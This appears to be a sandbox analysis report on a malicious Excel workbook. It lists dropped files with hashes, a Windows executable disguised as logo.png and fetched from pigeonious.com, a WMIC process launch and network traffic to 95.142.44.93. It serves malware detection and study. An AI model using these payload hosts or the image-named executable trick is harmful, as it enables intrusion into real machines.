Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-10T17:29:39">.. Build: 16.0.14209.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\96E7ABF8.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 2186 x 1539, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	462772
Entropy (8bit):	7.968569347884841
Encrypted:	false
SSDEEP:	12288:yycQMfTEzs+VfqjROL5bgSj86X/5ARknBqrZsNAdee:yQMfYBVf1xBARkgaNyr
MD5:	5D1C907B7A28ED91D8A704A7CE928FAF
SHA1:	FA56635F0C2A6D93DABE3E0636DADEAECDFCE804
SHA-256:	AD72EF87E54764A13E87BBD446029F48D70114B120E6DA7025947B1D51554486
SHA-512:	52A22A801395A467AABC02B4C24236FCAC4197407FC0F5C4B0D9C79C8DFB9A5DD0D935C67A7730B7EBFCD80013967F392D48D6E697A09E684BCDC62F7DBB6376
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR..............I.\....sRGB.........gAMA......a.....pHYs..!...!..........IDATx^...W.Y.7~...o=.33..&+..9.q.H..1..1.b..9+.P0G.E...T..$%.wk.......i..Y{.r.S....s..................!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z...............V!=.............UH.............h..3............Z..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\logo[1].png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	511488
Entropy (8bit):	7.3404073760047375
Encrypted:	false
SSDEEP:	12288:cyLjvFCsHOFO7t8BmzXiDm/znL2wOhlYuGUoPavYWIJdvrQoDptkYIN:BLDFTHOF0anwGYuGDQ2vQoDk5N
MD5:	526D56017EF5105277FE0D366C95C39D
SHA1:	78A40D523F4B887B2383681FECE447EF911C24EF
SHA-256:	28F2FA4F9AC95C3FC906E201B758D56C6A888B657DCF57C351A4F34FFB3E0FE2
SHA-512:	F2DC53598455B422B6B53108E94229B0F5791AC25188F0ED73FB4BFF1DF018B745F1F73714E97CF4E1C52475473326C1C91DC6070D331080F1FAAF696D58841E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	https://pigeonious.com/img/logo.png
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........p....,...,...,..,...,...,...,...,...,...,...,...,...,.).,...,..,...,...,...,Rich...,........................PE..L......`.....................~......#.............@..........................P............@.....................................(.......6.................... .......................................................................................text...9........................... ..`.rdata..............................@..@.data...\|....p.......X..............@....idata...............r..............@....rsrc...6............~..............@..@.reloc...#... ...$..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9B810000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	1041071
Entropy (8bit):	7.855849071117974
Encrypted:	false
SSDEEP:	12288:Ip4WH4vcCRa6p1RtTycQMfTEzs+VfqjROL5bgSj86X/5ARknBqrZsNAde+:G4vdRa6p1Rt/QMfYBVf1xBARkgaNyt
MD5:	E20BC69C6969DDBF5D19950216EBCC79
SHA1:	60809A68836DCE9E7B5959B9D975427C3DDE0122
SHA-256:	FDED8F0DDE8CF5DEACFB80DE6420A3CCD4F30971ACC364FF9DB855DE3D86AA4A
SHA-512:	C48879E97FC9DBBFA30C8554A1B21BC8D36B080F4AD6D4C0223C5F994C47BE4986ECEEBA038E4617EF4D8D65106E21FEA79042997BF107F2921828B35DCEE16D
Malicious:	false
Reputation:	low
Preview:	.T.n.0....?..........C....I?`M.%.\|..$..w);n..V.....;3;...f.l...L.jf.B..6.k.....QQ......."......6"U...}...zt@M..9...A.....j......T.g....C,..q.O6W..^.)Y./.o.}.....5.2...^.!..je...C7.....1;..d.1=`.\..y.3....qEsY?....4.{....J..D.d.N0..i..y?....X.C.w..-...%..2.us.....B...5.T.....9..*<.4..RI...)...GhJASY.......DG.k.rx........B.[...O.T...c.!.~..@....7.....H.......:....>.H<..Nw...Kv...S6x..c.t`.i....2N5.#.r..........PK..........!..j0.............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................M

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\3F97s4aQjB.xlsx.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:43 2020, mtime=Fri Jun 11 01:29:42 2021, atime=Fri Jun 11 01:29:42 2021, length=1040132, window=hide
Category:	dropped
Size (bytes):	2120
Entropy (8bit):	4.714364232851571
Encrypted:	false
SSDEEP:	24:8zNDaX/da9OUAJHaD0nKD7aB6myzNDaX/da9OUAJHaD0nKD7aB6m:8zNONJDnKaB6pzNONJDnKaB6
MD5:	B472516A8AC5D58E2AC16C39CD89EC38
SHA1:	8ADE9F104953A38DA6917729E309528DD86C2E7C
SHA-256:	3677EBF291B1C7954ADB892D9D37686C0520C71F33EFF9F8D305985E09D5E0AC
SHA-512:	4DFC0887B9E26EE12B7D70CD543C2C3105EE9753746005B86D520EBFC52C50E787818F42A05EC120FA1F52FB927AE7A93DAFA1FCD40624E1E8A29439683E5EB0
Malicious:	true
Reputation:	low
Preview:	L..................F.... ....2..:....Bm.i^....j.i^...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:.....q\|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..R.......S......................].h.a.r.d.z.....~.1.....>Qxx..Desktop.h.......Ny..R.......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....l.2.5&...R.. .3F97S4~1.XLS..P......>Qvx.R......h.........................3.F.9.7.s.4.a.Q.j.B...x.l.s.x.......U...............-.......T...........>.S......C:\Users\user\Desktop\3F97s4aQjB.xlsx..&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.3.F.9.7.s.4.a.Q.j.B...x.l.s.x.........:..,.LB.)...As...`.......X.......035347...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Fri Jun 11 01:29:41 2021, atime=Fri Jun 11 01:29:41 2021, length=12288, window=hide
Category:	dropped
Size (bytes):	904
Entropy (8bit):	4.652208144122537
Encrypted:	false
SSDEEP:	12:8YrXUwcuElPCH2AaSY3ouIk+WrjAZ/2bD/LC5Lu4t2Y+xIBjKZm:8cDatAZiD+87aB6m
MD5:	86C3AEC66964F8B6866416E31E93962D
SHA1:	3C2C30D348DA6A080E03B52ED039E806F29420D2
SHA-256:	BC2C38396F73A0F45177582F64F18992E369E9955EAA89B3DB11823DB19FF1A0
SHA-512:	7F6EB1D91A178E2E39ABBE6560701395E4E9C6F5E1D0F3E4516E33A27D672EF3CB59756004835213BF5935B68946580A7346DD242648B8F61614EC081D103DA2
Malicious:	false
Reputation:	low
Preview:	L..................F........N....-..NDN.i^..NDN.i^...0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:.....q\|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..R.......S......................].h.a.r.d.z.....~.1......R....Desktop.h.......Ny..R.......Y..............>.......".D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......035347...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	100
Entropy (8bit):	4.721266094754729
Encrypted:	false
SSDEEP:	3:oyBVomxWV2npWrXCMjD2npWrXCmxWV2npWrXCv:djlW3KWvWI
MD5:	4651D7899D0089D49B209C1EEFFC6F66
SHA1:	272A788D9B7814F71C0E53A39A8457512DD43BC2
SHA-256:	7DD3385C0FA67DE6A3477E1E63F4598339456786CC8C0E4B36F667A7D3BAB4FC
SHA-512:	93F4F6602DDC965678EB92C40E9C73174C52A2CBC8D111181744E646380B5E41F0197925086ED935B75D1C5627FBE684C373081B73404FC1CBCEB329959B9BC0
Malicious:	false
Reputation:	low
Preview:	Desktop.LNK=0..[misc]..3F97s4aQjB.xlsx.LNK=0..3F97s4aQjB.xlsx.LNK=0..[misc]..3F97s4aQjB.xlsx.LNK=0..

C:\Users\user\Desktop\EC810000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	1040132
Entropy (8bit):	7.8545301896779085
Encrypted:	false
SSDEEP:	24576:lQPPPPPD5rIf8w195QMfYBVf1xBARkgaNyn:BQMQh/m6Nyn
MD5:	90305FD4215DD8A8785DC7F6DD4143A6
SHA1:	A90ED0830BF373E01681C2B491101CD5AF1904A2
SHA-256:	384AC8CE1FF6CF1E8DBDF47CE04898887D669811B982655881FD2FB6F8BCED4D
SHA-512:	50D827E068818BB082EB80487D4CF76C8D835CB6BEAA950F1A4BD6185C61F59F0F34328F3154CBA5274C49F3778878E315B173B5470D46482D674FD3BECB0851
Malicious:	false
Reputation:	low
Preview:	.T.N.0..#....(q..!...G@j...o...my...=kS...P.J\.3...&.....8[..b 2.....x.=."CRV..Y(..PL......f\m.........:...`yg.B...C-.....9..nd.,..."....`.>Z..W.....X.....T.P..R.B...-...................0c...7.B......4]...wW.h.....W.V.1...=.qg......`0..W..Yu.\....s..0H_3..E....}.?.F.^.g...K.=u..I.......[.`.4..n..=..z..Q......g........g. 7.....:..!...G.......X.{..@.~Cb.e.e.<y..SX...-S........PK..........!...vR....6.......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H.......BKwAH.!T~.I....

C:\Users\user\Desktop\~$3F97s4aQjB.xls Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.6081032063576088
Encrypted:	false
SSDEEP:	3:RFXI6dtt:RJ1
MD5:	7AB76C81182111AC93ACF915CA8331D5
SHA1:	68B94B5D4C83A6FB415C8026AF61F3F8745E2559
SHA-256:	6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
SHA-512:	A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\Desktop\~$3F97s4aQjB.xlsx Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.6081032063576088
Encrypted:	false
SSDEEP:	3:RFXI6dtBhFXI6dtt:RJZhJ1
MD5:	836727206447D2C6B98C973E058460C9
SHA1:	D83351CF6DE78FEDE0142DE5434F9217C4F285D2
SHA-256:	D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
SHA-512:	7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
Malicious:	true
Reputation:	high, very likely benign file
Preview:	.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

\Device\ConDrv Download File
Process:	C:\Windows\SysWOW64\wbem\WMIC.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.083203110114614
Encrypted:	false
SSDEEP:	3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MglVvlJQAiveyzowv:Yw7gJGWMXJXKSOdYiygKkXe/eg3leAin
MD5:	04F5182CC4DB0183A73CC7E970598ED7
SHA1:	B8E7038F8D7FA64B8FC04EFEBB0100998379C772
SHA-256:	BB316A44410761BABF389A30CA439E952E13C90178E4D3E9C54F45B83998EBE0
SHA-512:	C875CC61B3E6DBDACFD26D6FA0D28F134572D1C8EF955357A2C40BC3B6FF6A6637C325B0237D1DA7E281595A85197E74B54C7FC4FA57B17C9E09F7913A64C199
Malicious:	false
Preview:	Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 7044;...ReturnValue = 0;..};....

Static File Info

General
File type:	Zip archive data, at least v2.0 to extract
Entropy (8bit):	7.994144310692157
TrID:	Excel Microsoft Office Binary workbook document (47504/1) 49.73% Excel Microsoft Office Open XML Format document (40004/1) 41.88% ZIP compressed archive (8000/1) 8.38% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
File name:	3F97s4aQjB.xlsx
File size:	468533
MD5:	1ac719c744d22f42e4978e7b55828435
SHA1:	4ddc7358f615987bf92ed9192430693db65b097c
SHA256:	d9be275feff4b3383821b1483ba93424fb27aa40e138da41a91511193d9538cb
SHA512:	736bcf96ca99c893c535c555133a092400e1dbc5f5143500d152c537bccc9d3faf7d541b3b11be82b68bbf4c7a1528c5fa3b45394d5b2b958c4d1d4d024e7d22
SSDEEP:	12288:ag+iWCVTHlJFnI6TDEeTSH/NJDjXcXdeanuxZ2:4iVVTHxNcoSJDK1nuxA
File Content Preview:	PK...........R................docProps/PK..........!.,...............docProps/app.xml.S.N.0.....`.N...Zu.#T.XQ.....u&.EbG.......m.ZNp{3o........"-8....x.Q.F.\.ML......x.&..5...xz-...Kg.p... a\|LK.f..W%....m.SXWK...0[.Z..U.5.d.Qt.`.`r./.^..)N[..hn.....vM...

File Icon


Icon Hash:	74ecd0d2d6d6d0dc

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	1

OLE File "3F97s4aQjB.xlsx"

Indicators
Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/10/21-19:29:51.613358	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 10, 2021 19:29:43.258378983 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.336587906 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.336781979 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.337631941 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.415893078 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.415950060 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.415990114 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.416032076 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.416059971 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.416095018 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.416150093 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.416157007 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.416161060 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.417321920 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.417413950 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.435136080 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.513605118 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.513775110 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.514929056 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.593521118 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.593578100 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.593615055 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.593641996 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.593655109 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.593673944 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.593679905 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.593693018 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.593698978 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.593744040 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.593754053 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.593787909 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.593801975 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.593828917 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.593853951 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.593871117 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.593875885 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.593909979 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.593928099 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.593962908 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.672254086 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.672313929 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.672349930 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.672365904 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.672389984 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.672410011 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.672415972 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.672430038 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:43.672449112 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:43.672468901 CEST	443	49724	95.142.44.93	192.168.2.3
